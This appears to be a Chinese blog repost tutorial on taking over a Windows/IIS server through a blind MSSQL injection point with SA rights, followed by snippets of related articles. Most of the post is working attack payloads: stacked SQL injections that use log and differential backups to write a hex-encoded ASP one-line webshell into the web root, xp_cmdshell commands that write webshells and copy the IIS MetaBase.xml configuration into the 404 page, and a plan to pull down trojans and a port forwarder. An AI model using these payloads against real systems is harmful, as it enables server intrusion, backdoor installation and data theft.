MSSQL注入SA权限不显错模式下的入侵

最新推荐文章于 2022-07-20 17:34:30 发布
最新推荐文章于 2022-07-20 17:34:30 发布
阅读量3.8k 收藏
点赞数
分类专栏: 渗透测试技术研究


【网络文章】

 

 

     一般扫到不显错的SA(systemadmin)的注入点时,虽然工具能猜表列目录但还是很麻烦有的人就直接放弃了,今天我给大家演示下如何利用。方法很简单大家看操作。

     我这里使用的是 火狐的插件提交参数。跟在浏览器里直接提交一样。


这里的主机环境:MSSQL+JSP 权限为不显错的SA,支持多行执行 xp_cmdshell存活 服务器处于内网,WEB和数据库在同一台服务器上。注意这里服务器操作系统是windows2003,IIS,404页面的默认路径是 C:\Windows\Help\iisHelp\common\404b.htm。

思路:

首先:

通过XP_CMDSHELL 执行命令再将执行结果指向IIS的404页面,然后访问WEB站点的一个不存在的目录得到命令执行结果,刺探服务器信息。

1.日志备份获得Webshell

2.数据库差异备份获得Webshell

4.直接下载免杀远控木马。

5.直接下载LCX将服务器端口转发出来

6.通过XP_CMDSHELL 执行命令读取iis配置文件(C:\Windows\system32\inetsrv\MetaBase.xml )分析查找WEB站点路径并在CMD下写入转义后的一句话获得WEBSHELL上传LCX将服务器转发出来。

 

 

◆日志备份:


1. 进行初始备份
; Alter Database TestDB Set Recovery Full Drop Table ttt Create Table ttt (a image) Backup Log TestDB to disk = '<e:\wwwroot\m.asp>' With Init--

2. 插入数据
;Insert Into ttt Values(0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E)--

0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E 为 一句话木马 %><%eval(request(chr(97))):response.end%>

3. 备份并获得文件,删除临时表
;Backup Log <数据库名> To Disk = '<e:\wwwroot\m.asp>';Drop Table ttt Alter Database TestDB Set Recovery SIMPLE--

 

◆数据库差异备份

(1. 进行差异备份准备工作

;Declare @a Sysname;Set @a=db_name();Declare @file VarChar(400);Set @file=<0x633A5C746573742E617370>;Drop Table ttt Create Table ttt(c Image) Backup Database @a To --

上面的 0x633A5C746573742E617370 是 c:\test.asp 路径转换后的16进制编码


(2. 将数据写入到数据库
;Insert Into ttt Values(0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E)--

0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E 为 一句话木马 %><%eval(request(chr(97))):response.end%>

3. 备份数据库并清理临时文件

;Declare @b SysName;Set @b=db_name();Declare @file1 VarChar(400);Set @file1=<0x633A5C746573742E617370>;Backup Database @b To With Differential,Format;Drop Table ttt;--

0x633A5C746573742E617370 为 c:\test.asp 删除临时文件

 

用^转义字符来写ASP(一句话木马)文件的方法:

1.注入点后执行 master.dbo.xp_cmdshell 'echo ^<script language=VBScript runat=server^>execute request^("90"^)^</script^> >c:\mu.asp';--

2.CMD下执行 echo ^<%execute^(request^("l"^)^)%^> >c:\mu.asp

读取IIS配置信息获取web路径


注入点后面执行 ;exec master..xp_cmdshell 'copy C:\Windows\system32\inetsrv\MetaBase.xml C:\Windows\Help\iisHelp\common\404b.htm'--

执行命令

注入点后面执行 ;exec master..xp_cmdshell 'ver >C:\Windows\Help\iisHelp\common\404b.htm'--

 

  成败还得看具体情况和RP!

eldn__
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
MSsql2005(Sa)权限执行命令总结.txt
07-18
权限执行命令总结权限执行命令总结
sql server注入执行命令
计算机毕业论文源码,学生个人网页制作html源码。贴近用户做网络推广和互联网优化。
11-12 1463
1. mssql权限 sa权限:数据库操作,文件管理,命令执行,注册表读取等system。是mssql的最高权限 db权限:文件管理,数据库操作等 users-administrators public权限:数据库操作 guest-users 2、sql server注入执行命令 查询数据库版本,数据库名字,用户名,操作系统 select * from member where id=-1 union select version(),database(),user(),@@version_compile_
SQLServer/MsSql注入漏洞步骤、使用方法
weixin_46928280的博客
07-20 4288
msSQL/SQLserver数据库的使用方法;渗透SQLserver数据库的步骤
sa权限(MSSQL注入SA权限不显错模式下的入侵
Coisini的博客
05-27 2148
内容:MSSQL注入SA权限不显错模式下的入侵 一般新手扫到不显错的SA(systemadmin)的注入点时,虽然工具能猜表列目录但还是很麻烦有的人就直接放弃了,今天我给大家演示下如何利用。方法很简单大家看操作。 我这里使用的是 火狐的插件提交参数。跟在浏览器里直接提交一样。 这里的主机环境:MSSQL+JSP 权限不显错的SA,支持多行执行 xp_cmdshell存活 服务器处于内网,WEB和...
SQL注入获取Sa账号密码
05-12 1950
漏洞位置:http://168.1.1.81/Information/Search?Keyword=1111 漏洞利用: MSSQL 2000 http://168.1.1.81/Information/Search ?Keyword=1111%' AND (Select master.dbo.fn_varbintohexstr(password) from mast...
MySQL注入攻击与防御
02-25
like,mod(),...)字符串的猜解操作(mid(),left(),rpad(),…)字符串生成操作(0x61,hex(),conv()(使用conv([10-36],10,36)可以实现所有字符的表示))可以用以下语句对一个可能的注入点进行测试以下是Mysql中可以用到的...
PHP+MYSQL 注入靶场
最新发布
04-26
里面有相关源码,参照源码去理解漏洞会更深刻,靶场中有SQL字符型注入,SQL盲注,提供给大家进行练习使用。
MySQL在不知道列名情况下的注入详解
09-09
主要给大家介绍了关于MySQL在不知道列名情况下的注入的相关资料,文中通过示例代码介绍的非常详细,对大家学习或者使用mysql具有一定的参考学习价值,需要的朋友们下面来一起学习学习吧
MySQL查询用户权限的方法总结
09-08
主要介绍了MySQL查询用户权限的方法总结内容,需要的朋友们可以参考下。
修改mysql允许主机访问的权限方法
09-09
默认mysql的用户是没有远程访问的权限的,因此当程序跟数据库不在同一台服务器上时,我们需要开启mysql的远程访问权限,下面通过本文给大家分享修改mysql允许主机访问的权限的方法,感兴趣的朋友一起看看吧
msSQL注入通杀 只要有注入点就有系统权限.rar
07-09
msSQL注入通杀,只要有注入点就有系统权限
sql server附加数据库时显示绝对路径解决办法
04-17
解决sqlserver附加数据库显示句对路径的问题或附加不上数据库的问题。史上最好的解决办法,一分钟轻松解决。
当注入拥有sa权限,提升webshell权限
大海的专栏
03-29 2449
 当注入拥有sa权限,提升webshell权限!修改权限为完全控制  程序代码eg: cacls d:/test /t /e /G everyone:f修改权限为只read 程序代码cacls d:/web/index.asp /e /t /P everyone:rCacls显示或修改指定文件上的随机访问控制列表 (DACL)。语法cacls FileNam
SQL Server 2008 SA 权限 注入点 而我却无可奈何
eldn__的专栏
12-03 3366
大神们都这样说: 这个是跨界要权的问题了 要解决这个问题就要避免用本地系统帐户启动sqlserver 指定一个存在于windows本地管理员的administrators组的用户来运行sqlserver服务,并且重启sqlserver 解决办法: 以管理员的身份运行SeverManagement Studio就可以了
***经验谈 MSSQL SA权限***的感悟
weixin_34186128的博客
09-22 120
***经验谈 MSSQL SA权限***的感悟   想必大家都知道MSSQLSA权限是什么,可以说是至高无上。今天我就它的危害再谈点儿,我所讲的是配合NBSI上传功能得到WebShell。在讲之前先说几个条件,否则得到Shell是有难度的。   1.存在SQL注入,并且数据库类型是MSSQL。   2.连接数据库的权限必须是SA。   3.后台必须有文件上传的...
MSSQL注入SA权限不显错模式下的 入 侵
weixin_30883311的博客
07-08 166
一般新手扫到不显错的SA(systemadmin)的注入点时,虽然工具能猜表列目录但还是很麻烦有的人就直接放弃了,今天我给大家演示下如何利用。方法很简单大家看操作。 我这里使用的是 火狐的插件提交参数。跟在浏览器里直接提交一样。 这里的主机环境:MSSQL+JSP 权限不显错的SA,支持多行执行 xp_cmdshell存活 服务器处于内网,WEB和数据库在同一台服务器上。注意这里服务器操作系...
Mssql注入总结(一)
weixin_34319999的博客
09-06 2781
转自:http://drops.wooyun.org/tips/1620默认数据库pubs不适用于MSSQL 2005model适用于所有版本msdb适用于所有版本tempdb适用于所有版本northwind适用于所有版本information_schema适用于MSSQL 2000及更高版本注释掉查询下面可以用来注释掉你注射后查询的其余部分:/ *C语言风格注释--SQL注...
MSSQL sa 弱口令提权基础知识学习
wjy397的专栏
06-29 2975
https://bbs.ichunqiu.com/thread-23312-1-1.html 1. “扩展存储过程”中的 xp_cmdshell Microsoft SQLServer是一个C/S模式的强大的关系型数据库管理系统,应用领域十分广泛,从网站后台数据库到一些MIS(管理信息系统)到处都可以看到它的身影。 网络安全中经常利用SqlServer SA
mssql注入sa权限被降为network service 得到webshell方法
Civil_War的专栏
07-19 2103
如果sa只有network service 权限,网上能搜索到的那些提权方法都是不能用的,这个内置账户的权限相当于USER.如果你无法通过数据库备份或通过SP_makewebtask得到webshell,可以这么做:xp_cmdshell可以cacls d: /e /t /g n
mysql 8.0.33版本/var/lib/mysql目录下权限
06-10
在MySQL 8.0.33版本中,/var/lib/mysql目录下的文件和目录的默认权限应该是: - 所有者为mysql用户,组为mysql组 - 数据库文件(.ibd、.frm、.MYD、.MYI等)的权限设置为660或664 - 日志文件(.err、.log等)的权限...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值